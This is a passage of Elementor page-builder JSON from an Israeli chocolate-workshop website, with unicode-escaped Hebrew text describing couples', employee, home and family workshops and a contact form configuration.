\\u05e9\\u05ea\\u05e8\\u05e6\\u05d5.\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/chocolate-workshops\\/chocolate-workshop-for-couples\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"image_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"image_size\":{\"unit\":\"%\",\"size\":55,\"sizes\":[]},\"title_bottom_space\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7b7ce5f\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"5817cff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7a1d0cb\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2019\\/12\\/Depositphotos_53956819_s-2019-1.jpg\",\"id\":416},\"title_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea\",\"description_text\":\"\\u05d4\\u05d7\\u05d1\\u05e8\\u05d4 \\u05d4\\u05db\\u05d9 \\u05d8\\u05d5\\u05d1\\u05d4 \\u05de\\u05ea\\u05d7\\u05ea\\u05e0\\u05ea \\u05d5\\u05d0\\u05ea \\u05de\\u05d0\\u05e8\\u05d2\\u05e0\\u05ea \\u05dc\\u05d4 \\u05d0\\u05ea \\u05d4\\u05d0\\u05d8\\u05e8\\u05e7\\u05e6\\u05d9\\u05d4 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05d4. \\u05e0\\u05db\\u05d5\\u05df, \\u05e0\\u05de\\u05d0\\u05e1 \\u05de\\u05db\\u05dc \\u05d4\\u05d4\\u05e4\\u05e2\\u05dc\\u05d5\\u05ea \\u05d4\\u05e0\\u05d3\\u05d5\\u05e9\\u05d5\\u05ea \\u05d5\\u05d4\\u05d2\\u05d9\\u05e2 \\u05d4\\u05d6\\u05de\\u05df \\u05dc\\u05d7\\u05d3\\u05e9. \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea \\u05e0\\u05d5\\u05e2\\u05d3\\u05d4 \\u05e2\\u05d1\\u05d5\\u05e8 \\u05d0\\u05dc\\u05d5 \\u05d4\\u05de\\u05d7\\u05e4\\u05e9\\u05d5\\u05ea  \\u05dc\\u05d2\\u05d5\\u05d5\\u05df  \\u05d0\\u05ea \\u05d4\\u05d4\\u05e4\\u05e2\\u05dc\\u05d5\\u05ea \\u05d4\\u05e9\\u05d2\\u05e8\\u05ea\\u05d9\\u05d5\\u05ea \\u05d5\\u05de\\u05d1\\u05d8\\u05d9\\u05d7\\u05d4 \\u05d7\\u05d5\\u05d5\\u05d9\\u05d9\\u05d4 \\u05d1\\u05dc\\u05ea\\u05d9 \\u05e0\\u05e9\\u05db\\u05ea \\u05dc\\u05db\\u05dc\\u05d4 \\u05dc\\u05e2\\u05ea\\u05d9\\u05d3 \\u05d5\\u05dc\\u05db\\u05dc \\u05d4\\u05d7\\u05d1\\u05e8\\u05d5\\u05ea \\u05d4\\u05de\\u05e9\\u05ea\\u05ea\\u05e4\\u05d5\\u05ea\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/chocolate-workshops\\/chocolate-workshop-for-bachelorette-party\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"image_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"image_size\":{\"unit\":\"%\",\"size\":55,\"sizes\":[]},\"title_bottom_space\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"ce1b43d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"23fa8d2\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2019\\/12\\/Depositphotos_247319794_s-2019-1.jpg\",\"id\":418},\"title_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05e2\\u05d5\\u05d1\\u05d3\\u05d9\\u05dd \\u05d5\\u05d7\\u05d1\\u05e8\\u05d5\\u05ea\",\"description_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05e2\\u05d5\\u05d1\\u05d3\\u05d9\\u05dd \\u05de\\u05d9\\u05d5\\u05e2\\u05d3\\u05ea \\u05e2\\u05d1\\u05d5\\u05e8 \\u05d0\\u05dc\\u05d5 \\u05d4\\u05de\\u05d7\\u05e4\\u05e9\\u05d9\\u05dd \\u05d9\\u05d5\\u05dd \\u05d2\\u05d9\\u05d1\\u05d5\\u05e9 \\u05d0\\u05d5 \\u05e2\\u05e8\\u05d1 \\u05d2\\u05d9\\u05d1\\u05d5\\u05e9 \\u05db\\u05d9\\u05d9\\u05e4\\u05d9 \\u05d5\\u05de\\u05e7\\u05d5\\u05e8\\u05d9 \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3. \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05e2\\u05d5\\u05d1\\u05d3\\u05d9\\u05dd \\u05de\\u05d2\\u05d1\\u05e9\\u05ea, \\u05de\\u05e8\\u05d2\\u05e9\\u05ea \\u05d5\\u05d1\\u05dc\\u05ea\\u05d9 \\u05e0\\u05e9\\u05db\\u05d7\\u05ea.\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/?page_id=100\",\"is_external\":\"\",\"nofollow\":\"\"},\"image_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"image_size\":{\"unit\":\"%\",\"size\":55,\"sizes\":[]},\"title_bottom_space\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"3a32e3a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a0f0677\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2019\\/12\\/Depositphotos_72660625_s-2019-1.jpg\",\"id\":420},\"title_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d1\\u05d1\\u05d9\\u05ea\",\"description_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d1\\u05d1\\u05d9\\u05ea \\u05de\\u05ea\\u05d0\\u05d9\\u05de\\u05d4 \\u05dc\\u05db\\u05dc \\u05d0\\u05dc\\u05d5 \\u05d4\\u05de\\u05d7\\u05e4\\u05e9\\u05d9\\u05dd \\u05dc\\u05d4\\u05e4\\u05d9\\u05e7 \\u05d0\\u05d9\\u05e8\\u05d5\\u05e2 \\u05de\\u05d1\\u05dc\\u05d9 \\u05dc\\u05e6\\u05d0\\u05ea \\u05de\\u05d4\\u05d1\\u05d9\\u05ea. \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05de\\u05d4\\u05d1\\u05d9\\u05ea \\u05de\\u05ea\\u05d0\\u05d9\\u05de\\u05d4 \\u05dc\\u05d9\\u05de\\u05d9 \\u05d4\\u05d5\\u05dc\\u05d3\\u05ea, \\u05e2\\u05e8\\u05d1\\u05d9 \\u05d2\\u05d9\\u05d1\\u05d5\\u05e9, \\u05d4\\u05e6\\u05e2\\u05ea \\u05e0\\u05d9\\u05e9\\u05d5\\u05d0\\u05d9\\u05df, \\u05d7\\u05d5\\u05d5\\u05d9\\u05d4 \\u05de\\u05e9\\u05e4\\u05d7\\u05ea\\u05d9\\u05ea, \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea \\u05d5\\u05e2\\u05d5\\u05d3. \\u05d4\\u05e6\\u05d9\\u05d5\\u05d3 \\u05e2\\u05dc\\u05d9\\u05e0\\u05d5, \\u05dc\\u05db\\u05dd \\u05e0\\u05e9\\u05d0\\u05e8 \\u05e8\\u05e7 \\u05dc\\u05d9\\u05d4\\u05e0\\u05d5\\u05ea\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/chocolate-workshops\\/home-chocolate-workshop\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"image_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"image_size\":{\"unit\":\"%\",\"size\":55,\"sizes\":[]},\"title_bottom_space\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4f4d3ed\",\"elType\":\"section\",\"settings\":{\"background_background\":\"gradient\",\"background_color\":\"#000000\",\"background_color_b\":\"#692910\"},\"elements\":[{\"id\":\"174e916\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"8132cb7\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e8\\u05d5\\u05e6\\u05d4 \\u05e9\\u05e4\\u05e9\\u05d5\\u05d8 \\u05e0\\u05d7\\u05d6\\u05d5\\u05e8 \\u05d0\\u05dc\\u05d9\\u05da \\u05e2\\u05dd \\u05db\\u05dc \\u05d4\\u05e4\\u05e8\\u05d8\\u05d9\\u05dd?\",\"align\":\"center\",\"title_color\":\"#ffffff\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"115d6a7\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"\\u05d8\\u05d5\\u05e4\\u05e1 \\u05d7\\u05d3\\u05e9\",\"form_fields\":[{\"custom_id\":\"name\",\"field_type\":\"text\",\"field_label\":\"\\u05e9\\u05dd\",\"placeholder\":\"\\u05e9\\u05dd\",\"width\":\"33\",\"_id\":\"11ed1fb\",\"required\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"recaptcha_badge\":\"bottomright\",\"css_classes\":\"\",\"field_value\":\"\"},{\"custom_id\":\"email\",\"field_type\":\"tel\",\"required\":\"true\",\"field_label\":\"\\u05d8\\u05dc\\u05e4\\u05d5\\u05df\",\"placeholder\":\"\\u05d8\\u05dc\\u05e4\\u05d5\\u05df\",\"width\":\"33\",\"_id\":\"f7dd8de\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"recaptcha_badge\":\"bottomright\",\"css_classes\":\"\",\"field_value\":\"\"}],\"input_size\":\"md\",\"show_labels\":\"\",\"button_text\":\"\\u05e9\\u05dc\\u05d9\\u05d7\\u05d4\",\"button_size\":\"md\",\"button_width\":\"33\",\"selected_button_icon\":{\"value\":\"fas fa-check\",\"library\":\"fa-solid\"},\"email_to\":\"shmulik@shmul.co.il\",\"email_subject\":\"\\u05d4\\u05d5\\u05d3\\u05e2\\u05d4 \\u05d7\\u05d3\\u05e9\\u05d4 \\u05de\\u05d0\\u05ea \\\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d34U\\\"\",\"email_content\":\"[all-fields]\",\"email_from\":\"email@chocolate4u.co.il\",\"email_from_name\":\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d34U\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"\\u05d4\\u05d5\\u05d3\\u05e2\\u05d4 \\u05d7\\u05d3\\u05e9\\u05d4 \\u05de\\u05d0\\u05ea \\\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d34U\\\"\",\"email_content_2\":\"[all-fields]\",\"email_from_2\":\"email@chocolate4u.co.il\",\"email_from_name_2\":\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d34U\",\"email_reply_to_2\":\"shmulik@shmul.co.il\",\"success_message\":\"\\u05d4\\u05d8\\u05d5\\u05e4\\u05e1 \\u05e0\\u05e9\\u05dc\\u05d7 \\u05d1\\u05d4\\u05e6\\u05dc\\u05d7\\u05d4.\",\"error_message\":\"\\u05d4\\u05ea\\u05e8\\u05d7\\u05e9\\u05d4 \\u05e9\\u05d2\\u05d9\\u05d0\\u05d4.\",\"required_field_message\":\"\\u05e9\\u05d3\\u05d4 \\u05d6\\u05d4 \\u05d4\\u05d5\\u05d0 \\u05e9\\u05d3\\u05d4 \\u05d7\\u05d5\\u05d1\\u05d4.\",\"invalid_message\":\"\\u05de\\u05e9\\u05d4\\u05d5 \\u05d4\\u05e9\\u05ea\\u05d1\\u05e9. \\u05d4\\u05d8\\u05d5\\u05e4\\u05e1 \\u05d0\\u05d9\\u05e0\\u05d5 \\u05d7\\u05d5\\u05e7\\u05d9.\",\"button_text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"form\"},{\"id\":\"d555ad1\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9c65b0d\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c6b8474\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"56c7701\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05dc\\u05d3, \\u05dc\\u05dc\\u05de\\u05d5\\u05d3 \\u05e2\\u05dc \\u05d7\\u05d5\\u05de\\u05e8 \\u05d4\\u05d2\\u05dc\\u05dd \\u05d4\\u05d8\\u05e2\\u05d9\\u05dd \\u05d1\\u05e2\\u05d5\\u05dc\\u05dd<\\/h2><p>\\u05e8\\u05d1\\u05d9\\u05dd \\u05d0\\u05d5\\u05d4\\u05d1\\u05d9\\u05dd \\u05de\\u05d0\\u05d5\\u05d3 \\u05dc\\u05d0\\u05db\\u05d5\\u05dc \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05e2\\u05dc \\u05d1\\u05e1\\u05d9\\u05e1 \\u05d9\\u05d5\\u05de\\u05d9 \\u05d5\\u05e0\\u05d4\\u05e0\\u05d9\\u05dd \\u05de\\u05d4\\u05d8\\u05e2\\u05dd \\u05d4\\u05de\\u05ea\\u05d5\\u05e7 \\u05e2\\u05dc \\u05d4\\u05dc\\u05e9\\u05d5\\u05df. \\u05d7\\u05dc\\u05e7 \\u05dc\\u05d0 \\u05e7\\u05d8\\u05df \\u05de\\u05e2\\u05d5\\u05e0\\u05d9\\u05d9\\u05df \\u05d3\\u05d5\\u05d5\\u05e7\\u05d0 \\u05dc\\u05d3\\u05e2\\u05ea \\u05d0\\u05d9\\u05da \\u05dc\\u05e2\\u05d1\\u05d5\\u05d3 \\u05d1\\u05e6\\u05d5\\u05e8\\u05d4 \\u05e0\\u05db\\u05d5\\u05e0\\u05d4 \\u05e2\\u05dd \\u05d7\\u05d5\\u05de\\u05e8 \\u05d4\\u05d2\\u05dc\\u05dd \\u05d4\\u05d9\\u05d5\\u05e7\\u05e8\\u05ea\\u05d9 \\u05d4\\u05d6\\u05d4, \\u05de\\u05d4 \\u05d4\\u05d3\\u05e8\\u05da \\u05d4\\u05db\\u05d9 \\u05d8\\u05d5\\u05d1\\u05d4 \\u05dc\\u05e9\\u05dc\\u05d1 \\u05d0\\u05d5\\u05ea\\u05d5 \\u05d1\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd, \\u05d0\\u05d9\\u05da \\u05d4\\u05db\\u05d9 \\u05e0\\u05db\\u05d5\\u05df \\u05dc\\u05d8\\u05de\\u05e4\\u05e8\\u05e8 \\u05d0\\u05d5\\u05ea\\u05d5 \\u05d5\\u05dc\\u05d9\\u05e6\\u05d5\\u05e8 \\u05de\\u05de\\u05e0\\u05d5 \\u05d9\\u05e6\\u05d9\\u05e8\\u05d5\\u05ea \\u05d9\\u05e4\\u05d9\\u05e4\\u05d9\\u05d5\\u05ea, \\u05d5\\u05d2\\u05dd \\u05de\\u05d4 \\u05d4\\u05d3\\u05e8\\u05db\\u05d9\\u05dd \\u05d4\\u05db\\u05d9 \\u05d8\\u05d5\\u05d1\\u05d5\\u05ea \\u05dc\\u05d8\\u05e4\\u05dc \\u05d1\\u05d5 \\u05d1\\u05e6\\u05d5\\u05e8\\u05d4 \\u05e9\\u05ea\\u05d5\\u05e6\\u05d9\\u05d0 \\u05de\\u05de\\u05e0\\u05d5 \\u05d0\\u05ea \\u05d4\\u05d0\\u05e8\\u05d5\\u05de\\u05d5\\u05ea \\u05d4\\u05d8\\u05d5\\u05d1\\u05d5\\u05ea \\u05d1\\u05d9\\u05d5\\u05ea\\u05e8 \\u05e9\\u05d9\\u05ea\\u05e8\\u05de\\u05d5 \\u05dc\\u05d8\\u05e2\\u05dd \\u05d4\\u05db\\u05dc\\u05dc\\u05d9 \\u05e9\\u05dc \\u05d4\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7.<\\/p><h2>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d1\\u05d1\\u05d9\\u05ea, \\u05de\\u05d4 \\u05d6\\u05d4 \\u05d0\\u05d5\\u05de\\u05e8?<\\/h2><p>\\u05dc\\u05de\\u05e2\\u05e9\\u05d4 \\u05de\\u05d3\\u05d5\\u05d1\\u05e8 \\u05d1\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d9\\u05d9\\u05d7\\u05d5\\u05d3\\u05d9\\u05ea \\u05d5\\u05d8\\u05e2\\u05d9\\u05de\\u05d4 \\u05e9\\u05ea\\u05d5\\u05db\\u05dc\\u05d5 \\u05dc\\u05e2\\u05e9\\u05d5\\u05ea \\u05d0\\u05e6\\u05dc\\u05db\\u05dd \\u05d1\\u05d1\\u05d9\\u05ea. <br \\/>\\u05db\\u05dc \\u05e1\\u05d3\\u05e0\\u05d4 \\u05de\\u05d5\\u05ea\\u05d0\\u05de\\u05ea \\u05dc\\u05de\\u05d0\\u05d5\\u05e8\\u05e2, \\u05dc\\u05d0\\u05d5\\u05e4\\u05d9 \\u05d4\\u05de\\u05e9\\u05ea\\u05ea\\u05e4\\u05d9\\u05dd \\u05d5\\u05dc\\u05db\\u05de\\u05d5\\u05ea \\u05d4\\u05de\\u05e9\\u05ea\\u05ea\\u05e4\\u05d9\\u05dd \\u05d1\\u05e1\\u05d3\\u05e0\\u05d4 \\u05e2\\u05e6\\u05de\\u05d4 (\\u05dc\\u05de\\u05e9\\u05dc, \\u05e0\\u05d9\\u05ea\\u05df \\u05dc\\u05e2\\u05e8\\u05d5\\u05da \\u05d1\\u05d1\\u05d9\\u05ea \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d6\\u05d5\\u05d2\\u05d5\\u05ea, \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05de\\u05e9\\u05e4\\u05d7\\u05ea\\u05d9\\u05ea, \\u05dc\\u05de\\u05d1\\u05d5\\u05d2\\u05e8\\u05d9\\u05dd \\u05d5\\u05e2\\u05d5\\u05d3), \\u05d1\\u05db\\u05dc \\u05e1\\u05d3\\u05e0\\u05d4 \\u05ea\\u05d5\\u05db\\u05dc\\u05d5 \\u05dc\\u05dc\\u05de\\u05d5\\u05d3 \\u05db\\u05d9\\u05e6\\u05d3 \\u05dc\\u05e0\\u05e6\\u05dc \\u05d0\\u05ea \\u05d7\\u05d5\\u05de\\u05e8\\u05d9 \\u05d4\\u05d2\\u05dc\\u05dd \\u05e9\\u05d9\\u05e9 \\u05dc\\u05db\\u05dd \\u05d1\\u05de\\u05e7\\u05e8\\u05e8 \\u05d1\\u05d1\\u05d9\\u05ea, \\u05d5\\u05de\\u05d5\\u05e6\\u05e8\\u05d9 \\u05d4\\u05d0\\u05e4\\u05d9\\u05d4 \\u05e9\\u05d9\\u05e9 \\u05d1\\u05db\\u05dc \\u05d0\\u05e8\\u05d5\\u05df, \\u05e2\\u05dc \\u05de\\u05e0\\u05ea \\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05de\\u05e8\\u05e9\\u05d9\\u05de\\u05d9\\u05dd \\u05d5\\u05d8\\u05e2\\u05d9\\u05de\\u05d9\\u05dd.<\\/p><p>\\u05dc\\u05de\\u05e2\\u05e9\\u05d4 \\u05dc\\u05d0 \\u05e6\\u05e8\\u05d9\\u05da \\u05d4\\u05db\\u05e0\\u05d4 \\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05ea, \\u05d5\\u05dc\\u05d0 \\u05ea\\u05d0\\u05dc\\u05e6\\u05d5 \\u05dc\\u05e8\\u05db\\u05d5\\u05e9 \\u05de\\u05d5\\u05e6\\u05e8\\u05d9\\u05dd \\u05d1\\u05d0\\u05d5\\u05e4\\u05df \\u05de\\u05d9\\u05d5\\u05d7\\u05d3. <br \\/>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d1\\u05d1\\u05d9\\u05ea \\u05de\\u05d5\\u05ea\\u05d0\\u05de\\u05ea \\u05dc\\u05de\\u05d5\\u05e6\\u05e8\\u05d9\\u05dd \\u05e9\\u05d9\\u05e9 \\u05dc\\u05db\\u05dd \\u05d1\\u05d1\\u05d9\\u05ea, \\u05dc\\u05ea\\u05e0\\u05d5\\u05e8 \\u05d4\\u05d1\\u05d9\\u05ea\\u05d9, \\u05dc\\u05de\\u05d9\\u05e7\\u05e1\\u05e8, \\u05dc\\u05de\\u05d8\\u05e8\\u05e4\\u05d4 \\u05d5\\u05d0\\u05e4\\u05d9\\u05dc\\u05d5 \\u05dc\\u05de\\u05e7\\u05e8\\u05e8 \\u05d4\\u05d1\\u05d9\\u05ea\\u05d9, \\u05e2\\u05dc \\u05de\\u05e0\\u05ea \\u05e9\\u05ea\\u05d5\\u05db\\u05dc\\u05d5 \\u05dc\\u05e9\\u05d5\\u05d1 \\u05d5\\u05dc\\u05e9\\u05d7\\u05d6\\u05e8 \\u05d0\\u05ea \\u05d4\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05dc\\u05d1\\u05d3\\u05db\\u05dd.<\\/p><h2>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05d1\\u05d5\\u05d2\\u05e8\\u05d9\\u05dd, \\u05dc\\u05d0\\u05d9\\u05e8\\u05d5\\u05e2\\u05d9\\u05dd \\u05d4\\u05d7\\u05e9\\u05d5\\u05d1\\u05d9\\u05dd \\u05d1\\u05d7\\u05d9\\u05d9\\u05dd<\\/h2><p>\\u05dc\\u05d0 \\u05de\\u05e2\\u05d8 \\u05d0\\u05e0\\u05e9\\u05d9\\u05dd \\u05d1\\u05d5\\u05d7\\u05e8\\u05d9\\u05dd \\u05d1\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05d1\\u05d5\\u05d2\\u05e8\\u05d9\\u05dd \\u05e2\\u05dc \\u05de\\u05e0\\u05ea \\u05dc\\u05d7\\u05d2\\u05d5\\u05d2 \\u05d0\\u05d9\\u05e8\\u05d5\\u05e2\\u05d9\\u05dd \\u05d7\\u05e9\\u05d5\\u05d1\\u05d9\\u05dd \\u05d1\\u05d7\\u05d9\\u05d9\\u05dd. <br \\/>\\u05ea\\u05d7\\u05e9\\u05d1\\u05d5 \\u05e2\\u05dc \\u05d6\\u05d4 \\u05e8\\u05d2\\u05e2. \\u05de\\u05d4 \\u05d9\\u05d5\\u05ea\\u05e8 \\u05db\\u05d9\\u05e3, \\u05de\\u05d4\\u05e0\\u05d4 \\u05d5\\u05de\\u05d9\\u05d5\\u05d7\\u05d3 \\u05de\\u05dc\\u05d7\\u05d2\\u05d5\\u05d2 \\u05e2\\u05dd \\u05d4\\u05d0\\u05d4\\u05d5\\u05d1\\u05d9\\u05dd \\u05e9\\u05dc\\u05db\\u05dd \\u05d5\\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05d8\\u05e2\\u05d9\\u05de\\u05d9\\u05dd? \\u05de\\u05d4 \\u05d9\\u05db\\u05d5\\u05dc \\u05dc\\u05d4\\u05d9\\u05d5\\u05ea \\u05d9\\u05d5\\u05ea\\u05e8 \\u05de\\u05d4\\u05e0\\u05d4 \\u05de\\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05d0\\u05ea \\u05d4\\u05db\\u05d9\\u05d1\\u05d5\\u05d3 \\u05e9\\u05d0\\u05d5\\u05ea\\u05d5 \\u05ea\\u05d0\\u05db\\u05dc\\u05d5 \\u05dc\\u05d2\\u05de\\u05e8\\u05d9 \\u05d1\\u05e2\\u05e6\\u05de\\u05db\\u05dd? \\u05de\\u05d4 \\u05d9\\u05db\\u05d5\\u05dc \\u05dc\\u05d4\\u05d9\\u05d5\\u05ea \\u05db\\u05d9\\u05e3 \\u05d5\\u05de\\u05ea\\u05d5\\u05e7 \\u05d9\\u05d5\\u05ea\\u05e8 \\u05de\\u05e9\\u05d9\\u05dc\\u05d5\\u05d1 \\u05e9\\u05dc \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d1\\u05e9\\u05de\\u05d7\\u05d4 \\u05e9\\u05dc\\u05db\\u05dd?<\\/p><h2>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05de\\u05e9\\u05e4\\u05d7\\u05ea\\u05d9\\u05ea, \\u05dc\\u05e6\\u05d1\\u05d5\\u05e8 \\u05d7\\u05d5\\u05d5\\u05d9\\u05d5\\u05ea \\u05d9\\u05d7\\u05d3<\\/h2><p>\\u05de\\u05e9\\u05e4\\u05d7\\u05d5\\u05ea \\u05e8\\u05d1\\u05d5\\u05ea \\u05d1\\u05d5\\u05d7\\u05e8\\u05d5\\u05ea \\u05dc\\u05e2\\u05e8\\u05d5\\u05da \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05de\\u05e9\\u05e4\\u05d7\\u05ea\\u05d9\\u05ea \\u05d0\\u05e6\\u05dc\\u05dd \\u05d1\\u05d1\\u05d9\\u05ea. <br \\/>\\u05d9\\u05e9\\u05e0\\u05dd \\u05dc\\u05d0 \\u05de\\u05e2\\u05d8 \\u05de\\u05e9\\u05e4\\u05d7\\u05d5\\u05ea \\u05d7\\u05d5\\u05d1\\u05d1\\u05d5\\u05ea \\u05d0\\u05d5\\u05db\\u05dc, \\u05e2\\u05dd \\u05d6\\u05d9\\u05e7\\u05d4 \\u05dc\\u05de\\u05d8\\u05d1\\u05d7 \\u05d5\\u05d0\\u05d4\\u05d1\\u05d4 \\u05dc\\u05d7\\u05d5\\u05de\\u05e8\\u05d9 \\u05d4\\u05d2\\u05dc\\u05dd \\u05d4\\u05e9\\u05d5\\u05e0\\u05d9\\u05dd, \\u05e9\\u05d9\\u05db\\u05d5\\u05dc\\u05d5\\u05ea \\u05d1\\u05d4\\u05d7\\u05dc\\u05d8 \\u05dc\\u05d4\\u05e0\\u05d5\\u05ea \\u05de\\u05d4\\u05e4\\u05e2\\u05d9\\u05dc\\u05d5\\u05ea \\u05d4\\u05d6\\u05d5.<\\/p><p>\\u05de\\u05e9\\u05e4\\u05d7\\u05d5\\u05ea \\u05e9\\u05de\\u05d7\\u05e4\\u05e9\\u05d5\\u05ea \\u05e4\\u05e2\\u05d9\\u05dc\\u05d5\\u05ea \\u05e7\\u05e6\\u05ea \\u05e9\\u05d5\\u05e0\\u05d4 \\u05d5\\u05d0\\u05d7\\u05e8\\u05ea, \\u05d6\\u05de\\u05df \\u05d2\\u05d9\\u05d1\\u05d5\\u05e9 \\u05de\\u05e9\\u05e4\\u05d7\\u05ea\\u05d9, \\u05d7\\u05d5\\u05d5\\u05d9\\u05d4 \\u05d9\\u05d5\\u05e6\\u05d0\\u05ea \\u05d3\\u05d5\\u05e4\\u05df, \\u05d5\\u05dc\\u05e9\\u05dc\\u05d1 